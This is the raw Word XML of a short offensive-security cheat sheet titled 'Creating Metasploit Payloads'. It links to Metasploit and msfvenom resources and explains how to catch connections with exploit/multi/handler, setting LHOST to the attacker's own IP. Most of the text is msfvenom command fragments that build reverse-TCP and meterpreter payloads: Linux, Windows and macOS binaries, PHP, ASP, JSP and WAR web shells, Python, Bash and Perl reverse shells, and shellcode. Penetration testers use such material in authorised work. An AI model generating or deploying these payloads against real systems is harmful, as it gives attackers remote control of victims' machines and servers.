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B8E7" w14:textId="5814E74C" w:rsidR="00736259" w:rsidRDefault="00736259" w:rsidP="00736259">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00736259">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Creating Metasploit Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFE83CF" w14:textId="484DE303" w:rsidR="00C20CF1" w:rsidRDefault="003517F6" w:rsidP="00736259">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidR="00C20CF1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/binary-payloads/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F0AC1C1" w14:textId="2FFCD0BE" w:rsidR="00320EB1" w:rsidRDefault="003517F6" w:rsidP="00736259">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00320EB1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://nitesculucian.github.io/2018/07/24/msfvenom-cheat-sheet/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="10E0E184" w14:textId="723B3E68" w:rsidR="00A24EA8" w:rsidRDefault="00A24EA8" w:rsidP="00736259">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4230B247" w14:textId="77777777" w:rsidR="00320EB1" w:rsidRPr="00C20CF1" w:rsidRDefault="00320EB1" w:rsidP="00736259">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E09657D" w14:textId="274CDC40" w:rsidR="00736259" w:rsidRPr="003517F6" w:rsidRDefault="00736259" w:rsidP="00736259">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003517F6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and it helps something that can give you a shell in almost any situation. For each of these payloads you can go into msfconsole and select exploit/multi/handler. Run ‘set payload’ for the relevant payload used and configure all necessary options (LHOST, LPORT, etc.). Execute and wait for the payload to be run. For the examples below it’s pretty self-explanatory but LHOST should be filled in with your IP address (LAN IP if attacking within the network, WAN IP if attacking across the internet), and LPORT should be the port you wish to be connected back on.</w:t>
      </w:r>
      <w:r w:rsidRPr="003517F6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="69873C35"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List payloads</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>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0500"/>
      </w:tblGrid>
      <w:tr w:rsidR="00736259" w:rsidRPr="00736259" w14:paraId="02D7B03E" w14:textId="77777777" w:rsidTr="00736259">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="041DB5E4"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-l</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2790E7C8"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Binaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D18B268"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Linux</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="13980" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="13980"/>
      </w:tblGrid>
      <w:tr w:rsidR="00736259" w:rsidRPr="00736259" w14:paraId="71A65924" w14:textId="77777777" w:rsidTr="00736259">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13980" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37812CF4"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linux</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x86</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meterpreter</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reverse_tcp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elf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shell.elf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="15B6A561"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Windows</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="13755" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="13755"/>
      </w:tblGrid>
      <w:tr w:rsidR="00736259" w:rsidRPr="00736259" w14:paraId="7ECE8FE8" w14:textId="77777777" w:rsidTr="00736259">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AF331EA"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windows</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meterpreter</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reverse_tcp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exe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shell.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5573B66F"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Mac</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="13530" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="13530"/>
      </w:tblGrid>
      <w:tr w:rsidR="00736259" w:rsidRPr="00736259" w14:paraId="25D33EA3" w14:textId="77777777" w:rsidTr="00736259">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="532AA39A"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lastRenderedPageBreak/>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osx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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x86</w:t>
            </w:r>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shell_reverse_tcp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macho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proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00736259">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>shell.macho</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3416B813"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Web Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A087F8"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PHP</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="13290" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="13290"/>
      </w:tblGrid>
      <w:tr w:rsidR="00736259" w:rsidRPr="00736259" w14:paraId="0C46C9D0" w14:textId="77777777" w:rsidTr="00736259">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13290" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="378D117B"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php</w:t>
            </w:r>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meterpreter_reverse_tcp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raw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shell.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="39E4741A"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b/>
                <w:bCs/>
                <w:color w:val="C20CB9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cat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shell.php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pbcopy</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&amp;&amp;</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7A0874"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>echo</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FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>'&lt;?php '</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C20CB9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tr</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-d</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FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>'\n'</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shell.php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&amp;&amp;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pbpaste</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&gt;&gt;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shell.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12B8E52A"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ASP</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="13755" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="13755"/>
      </w:tblGrid>
      <w:tr w:rsidR="00736259" w:rsidRPr="00736259" w14:paraId="54F12F16" w14:textId="77777777" w:rsidTr="00736259">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A3C435D"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windows</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meterpreter</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reverse_tcp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asp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shell.asp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="43A832D6"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JSP</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="13170" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="13170"/>
      </w:tblGrid>
      <w:tr w:rsidR="00736259" w:rsidRPr="00736259" w14:paraId="40C855DC" w14:textId="77777777" w:rsidTr="00736259">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13170" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26B31F66"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java</w:t>
            </w:r>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jsp_shell_reverse_tcp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raw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shell.jsp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6092AF8A"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WAR</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="13170" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="13170"/>
      </w:tblGrid>
      <w:tr w:rsidR="00736259" w:rsidRPr="00736259" w14:paraId="1FA615AF" w14:textId="77777777" w:rsidTr="00736259">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13170" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76651A12"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java</w:t>
            </w:r>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jsp_shell_reverse_tcp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war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shell.war</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="419A98D7"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Scripting Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E647C5"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Python</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="12720" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="12720"/>
      </w:tblGrid>
      <w:tr w:rsidR="00736259" w:rsidRPr="00736259" w14:paraId="68D0470D" w14:textId="77777777" w:rsidTr="00736259">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12720" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="375C3E56"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cmd</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unix</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reverse_python</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raw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shell.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1942A773"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Bash</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="12480" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="12480"/>
      </w:tblGrid>
      <w:tr w:rsidR="00736259" w:rsidRPr="00736259" w14:paraId="0BC28DC3" w14:textId="77777777" w:rsidTr="00736259">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12480" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D1EA592"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lastRenderedPageBreak/>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cmd</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unix</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reverse_bash</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raw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shell.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="41C51C66"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Perl</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="12480" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="12480"/>
      </w:tblGrid>
      <w:tr w:rsidR="00736259" w:rsidRPr="00736259" w14:paraId="2FDF6D7C" w14:textId="77777777" w:rsidTr="00736259">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12480" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41DF557D"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cmd</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unix</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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reverse_perl</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raw </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shell.pl</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2977F60E"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Shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A273FEA"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color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECBE320"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Linux Based Shellcode</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="13410" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="13410"/>
      </w:tblGrid>
      <w:tr w:rsidR="00736259" w:rsidRPr="00736259" w14:paraId="52D9BA12" w14:textId="77777777" w:rsidTr="00736259">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13410" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ED52AD9"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linux</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x86</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meterpreter</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reverse_tcp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language</w:t>
            </w:r>
            <w:r w:rsidRPr="00736259">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="05C42C78"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Windows Based Shellcode</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="13170" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="13170"/>
      </w:tblGrid>
      <w:tr w:rsidR="00736259" w:rsidRPr="00736259" w14:paraId="3252C77B" w14:textId="77777777" w:rsidTr="00736259">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13170" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51EAA899"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msfvenom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windows</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meterpreter</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 xml:space="preserve">reverse_tcp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language</w:t>
            </w:r>
            <w:r w:rsidRPr="00736259">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2CBB819E"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b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mac Based Shellcode</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="12480" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="12480"/>
      </w:tblGrid>
      <w:tr w:rsidR="00736259" w:rsidRPr="00736259" w14:paraId="2C427338" w14:textId="77777777" w:rsidTr="00736259">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12480" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30684C43"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736259">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>msfvenom</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-p</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osx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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x86</w:t>
            </w:r>
            <w:r w:rsidRPr="00736259">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00736259">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>shell_reverse_tcp</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LHOST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IP Address</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007800"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LPORT</w:t>
            </w:r>
            <w:r w:rsidRPr="00736259">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>=</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Your Port to Connect On</w:t>
            </w:r>
            <w:r w:rsidRPr="00736259">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>&gt;</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-f</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language</w:t>
            </w:r>
            <w:r w:rsidRPr="00736259">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C4AECC2" w14:textId="77777777" w:rsidR="00736259" w:rsidRPr="00736259" w:rsidRDefault="00736259" w:rsidP="00736259">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00736259">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
